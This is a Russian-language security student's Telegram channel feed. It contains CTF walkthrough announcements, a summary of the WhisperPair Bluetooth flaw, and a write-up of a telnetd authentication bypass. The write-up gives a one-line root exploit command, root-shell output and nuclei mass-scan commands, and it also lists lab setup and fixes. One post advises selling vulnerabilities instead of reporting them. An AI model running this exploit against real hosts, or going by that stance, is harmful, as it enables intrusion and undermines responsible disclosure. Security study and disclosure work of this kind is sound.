Теперь я почти официально дипломированный специалист по разработке встроенного программного обеспечения робототехнических устройств! Только сам диплом дадут в конце 4 курса, пока что только справка, о том, что я крутой. Также хочу потом пойти в магистратуру. 3 высший образования, звучит интересно)
🔥6
Media is too big
VIEW IN TELEGRAM
Мне кажется, что будет полезно, если я начну потихоньку разбирать задания некоторых CTF. В планах делать разборы на категории web и pwn. Пока что начну с сайта DUCKERZ, дальше посмотрим, первый разбор, как вводная суперпростая тачка на #pwn
👍2
Небольшая памятка мне на будущее. В случае обнаружения уязвимости в компании, у которой нет bug bounty программы, нет смысла сообщать о ней руководству или разработчикам. Проще либо проигнорировать, либо продать её где-нибудь. Потому что я ебал за "спасибо" работать
❤6
Media is too big
VIEW IN TELEGRAM
Продолжаю разбирать задания по #pwn с сайта DUCKERZ, сегодня получим шелл через перезапись got plt во втором по сложности задании "Простой калькулятор"
👍3
Media is too big
VIEW IN TELEGRAM
Разбор предпоследней таски из решённых мною. Это уже medium уровень, хотя я бы её к таковому не отнёс. В видосе эксплуатирую use-after-free #pwn
❤1
В этот раз, в таске hostel я по просьбе DUCKERZ не показываю сам флаг. А лишь демонстрирую один из методов решения
— Food ninja, насколько ты доверяешь телеграму и уверена в том, что я владею данным номером телефона?
— На все 100!
Несмотря на то, что я ранее говорил, что не буду больше писать компаниям об уязвимостях. Я обязан осветить этот рофлельный метод захвата аккаунтов. На текущий момент я просто отписался в отдел техподдержки и всё им рассказал. Сам эксплоит не дам, пусть он и супер простой, просто имейте в виду, что если пишите тг ботов, не доверяйте отправленным номерам телефона в формате контактов)
— На все 100!
Несмотря на то, что я ранее говорил, что не буду больше писать компаниям об уязвимостях. Я обязан осветить этот рофлельный метод захвата аккаунтов. На текущий момент я просто отписался в отдел техподдержки и всё им рассказал. Сам эксплоит не дам, пусть он и супер простой, просто имейте в виду, что если пишите тг ботов, не доверяйте отправленным номерам телефона в формате контактов)
❤1
Всех с новой годой по МСК+2. Желаю всем в этом году всего всего всего. Желаю безопасникам в этом тгк весёлых багов и больших баунти, а остальным быть в безопасности и не попадаться на уловки мошенников🎉
❤3
Hacking_Cheatsheet.md
25 KB
Мне показалось полезным наконец-то структурировать все свои файлы с заметками в 1. Объединял их gemini, но я прочитал, в целом, +- это что надо. Эту инфу я собрал в течение года, с разных ctf райтапов, тасок с htb и thm, а также с видосов на ютубе и статей
❤5
Media is too big
VIEW IN TELEGRAM
А вот и четвёртый разбор pwn тасок с duckerz, если в ближайшее время мне будет не лень, то я запишу и пятый. На текущий момент мне осталось разобраться с 2 тасками до завершения всех.
Сегодня в видео разместим shellcode на стеке и вспомним про конвенцию вызовов в Linux x86_64. #pwn
Сегодня в видео разместим shellcode на стеке и вспомним про конвенцию вызовов в Linux x86_64. #pwn
❤1
Media is too big
VIEW IN TELEGRAM
Сегодня нет настроения доснимать пятый pwn из 6, поэтому для разнообразия решил и разобрал самую сложную и дорогую по очкам таску на #web со всё тех же DUCKERZ.
❤5
# WhisperPair (CVE-2025-36911): критическая уязвимость в Google Fast Pair
В рамках недавнего раскрытия уязвимости WhisperPair стало известно о критическом недостатке в реализации протокола Google Fast Pair, который затрагивает сотни миллионов Bluetooth-аудиоустройств (наушники, колонки) таких брендов, как Google, Sony, JBL, Xiaomi и др.
## Техническая суть
Проблема кроется в нарушении логики работы конечного автомата (state machine) на стороне аксессуара. По спецификации Fast Pair устройство должно игнорировать запросы на сопряжение, если оно не находится в режиме «Pairing Mode» (активируемом физической кнопкой).
Однако на практике многие производители не реализовали проверку текущего состояния. Это позволяет атакующему:
Принудительное сопряжение
Находясь в радиусе действия Bluetooth (до 14 метров), злоумышленник инициирует процедуру Fast Pair. Аксессуар отвечает на запрос даже в процессе активного использования легитимным владельцем.
Перехват управления
После обмена ключами Fast Pair атакующий завершает стандартное Bluetooth-подключение. Это дает полный контроль над аудиопотоком: можно прослушивать окружение через встроенные микрофоны или транслировать любой звук.
Tracking & Takeover
Если устройство ранее не было привязано к Android-аккаунту (например, используется с iPhone), атакующий может первым записать в память устройства свой Owner Account Key. Это позволяет добавить чужой девайс в свою сеть Google «Найти устройство» и отслеживать геопозицию жертвы в реальном времени.
## Реализация и защита
Уязвимость критична тем, что её невозможно отключить на стороне смартфона — проблема именно в прошивке аксессуара. Исследователи из KU Leuven подтвердили успешную атаку в 68% протестированных моделей.
На GitHub уже опубликован публичный эксплоит, который позволяет автоматизировать поиск уязвимых устройств в радиусе видимости и проводить атаку без физического доступа.
Сам эксплоит
---
*Владельцам затронутых устройств рекомендуется следить за обновлениями прошивок от производителей.*
В рамках недавнего раскрытия уязвимости WhisperPair стало известно о критическом недостатке в реализации протокола Google Fast Pair, который затрагивает сотни миллионов Bluetooth-аудиоустройств (наушники, колонки) таких брендов, как Google, Sony, JBL, Xiaomi и др.
## Техническая суть
Проблема кроется в нарушении логики работы конечного автомата (state machine) на стороне аксессуара. По спецификации Fast Pair устройство должно игнорировать запросы на сопряжение, если оно не находится в режиме «Pairing Mode» (активируемом физической кнопкой).
Однако на практике многие производители не реализовали проверку текущего состояния. Это позволяет атакующему:
Принудительное сопряжение
Находясь в радиусе действия Bluetooth (до 14 метров), злоумышленник инициирует процедуру Fast Pair. Аксессуар отвечает на запрос даже в процессе активного использования легитимным владельцем.
Перехват управления
После обмена ключами Fast Pair атакующий завершает стандартное Bluetooth-подключение. Это дает полный контроль над аудиопотоком: можно прослушивать окружение через встроенные микрофоны или транслировать любой звук.
Tracking & Takeover
Если устройство ранее не было привязано к Android-аккаунту (например, используется с iPhone), атакующий может первым записать в память устройства свой Owner Account Key. Это позволяет добавить чужой девайс в свою сеть Google «Найти устройство» и отслеживать геопозицию жертвы в реальном времени.
## Реализация и защита
Уязвимость критична тем, что её невозможно отключить на стороне смартфона — проблема именно в прошивке аксессуара. Исследователи из KU Leuven подтвердили успешную атаку в 68% протестированных моделей.
На GitHub уже опубликован публичный эксплоит, который позволяет автоматизировать поиск уязвимых устройств в радиусе видимости и проводить атаку без физического доступа.
Сам эксплоит
---
*Владельцам затронутых устройств рекомендуется следить за обновлениями прошивок от производителей.*
GitHub
GitHub - zalexdev/wpair-app: WPair is a defensive security research tool that demonstrates the CVE-2025-36911 (eg WhisperPair)…
WPair is a defensive security research tool that demonstrates the CVE-2025-36911 (eg WhisperPair) vulnerability in Google's Fast Pair protocol. This vulnerability affects millions of Blueto...
😁4🤨2
CVE-2026-24061: root через telnet одной командой
Нашли критическую уязвимость в GNU inetutils telnetd, которая даёт root без пароля. CVSS 9.8/10.
Суть бага
В 2015 году в telnetd добавили новый шаблон логина с параметром %U:
/usr/bin/login -p -h %h %?u{-f %u}{%U}
Переменная окружения USER передаётся через telnet протокол (RFC 1572) и не санитизируется. Классический argument injection.
Эксплуатация
Одна команда:
USER="-f root" telnet -a target.com 23
Что происходит:
1. Telnet отправляет USER на сервер
2. Сервер подставляет в команду: /usr/bin/login -p -h hostname -f root
3. Флаг -f означает "skip authentication"
4. Получаем root shell
Результат:
root@target:~# id
uid=0(root) gid=0(root) groups=0(root)
Кого касается
- GNU inetutils telnetd (например 2:2.0-1+deb11u2)
- Системы без Kerberos
- IoT/embedded устройства где telnet всё ещё используется
В продакшене telnet обычно отключен, но на легаси и IoT железках встречается.
Nuclei template
Запилил автоматический шаблон для сканирования.
Базовое использование:
nuclei -t cve-2026-24061.yaml -u target.com:23 -code
Массовое сканирование:
nuclei -t cve-2026-24061.yaml -l targets.txt -code
Тестовая лаба
Поднять уязвимый контейнер:
docker build -t vuln-telnetd .
docker run -d -p 2323:23 vuln-telnetd
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code
Защита
1. Обновить inetutils
2. Отключить telnet, использовать SSH
3. Фильтровать порт 23 на фаерволе
4. Мониторить подключения
GitHub
Всё выложил на GitHub: https://github.com/Mr-Zapi/CVE-2026-24061
В репо готовый Nuclei template, Dockerfile для лабы, примеры использования.
Ссылки
NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-24061
Детальный анализ: https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/
Уязвимый коммит: https://codeberg.org/inetutils/inetutils/commit/fa3245ac8c288b87139a0da8249d0a408c4dfb87
---
#cve #telnet #nuclei #appsec
Нашли критическую уязвимость в GNU inetutils telnetd, которая даёт root без пароля. CVSS 9.8/10.
Суть бага
В 2015 году в telnetd добавили новый шаблон логина с параметром %U:
/usr/bin/login -p -h %h %?u{-f %u}{%U}
Переменная окружения USER передаётся через telnet протокол (RFC 1572) и не санитизируется. Классический argument injection.
Эксплуатация
Одна команда:
USER="-f root" telnet -a target.com 23
Что происходит:
1. Telnet отправляет USER на сервер
2. Сервер подставляет в команду: /usr/bin/login -p -h hostname -f root
3. Флаг -f означает "skip authentication"
4. Получаем root shell
Результат:
root@target:~# id
uid=0(root) gid=0(root) groups=0(root)
Кого касается
- GNU inetutils telnetd (например 2:2.0-1+deb11u2)
- Системы без Kerberos
- IoT/embedded устройства где telnet всё ещё используется
В продакшене telnet обычно отключен, но на легаси и IoT железках встречается.
Nuclei template
Запилил автоматический шаблон для сканирования.
Базовое использование:
nuclei -t cve-2026-24061.yaml -u target.com:23 -code
Массовое сканирование:
nuclei -t cve-2026-24061.yaml -l targets.txt -code
Тестовая лаба
Поднять уязвимый контейнер:
docker build -t vuln-telnetd .
docker run -d -p 2323:23 vuln-telnetd
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code
Защита
1. Обновить inetutils
2. Отключить telnet, использовать SSH
3. Фильтровать порт 23 на фаерволе
4. Мониторить подключения
GitHub
Всё выложил на GitHub: https://github.com/Mr-Zapi/CVE-2026-24061
В репо готовый Nuclei template, Dockerfile для лабы, примеры использования.
Ссылки
NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-24061
Детальный анализ: https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/
Уязвимый коммит: https://codeberg.org/inetutils/inetutils/commit/fa3245ac8c288b87139a0da8249d0a408c4dfb87
---
#cve #telnet #nuclei #appsec
GitHub
GitHub - Mr-Zapi/CVE-2026-24061: Nuclei template for CVE-2026-24061
Nuclei template for CVE-2026-24061. Contribute to Mr-Zapi/CVE-2026-24061 development by creating an account on GitHub.
❤4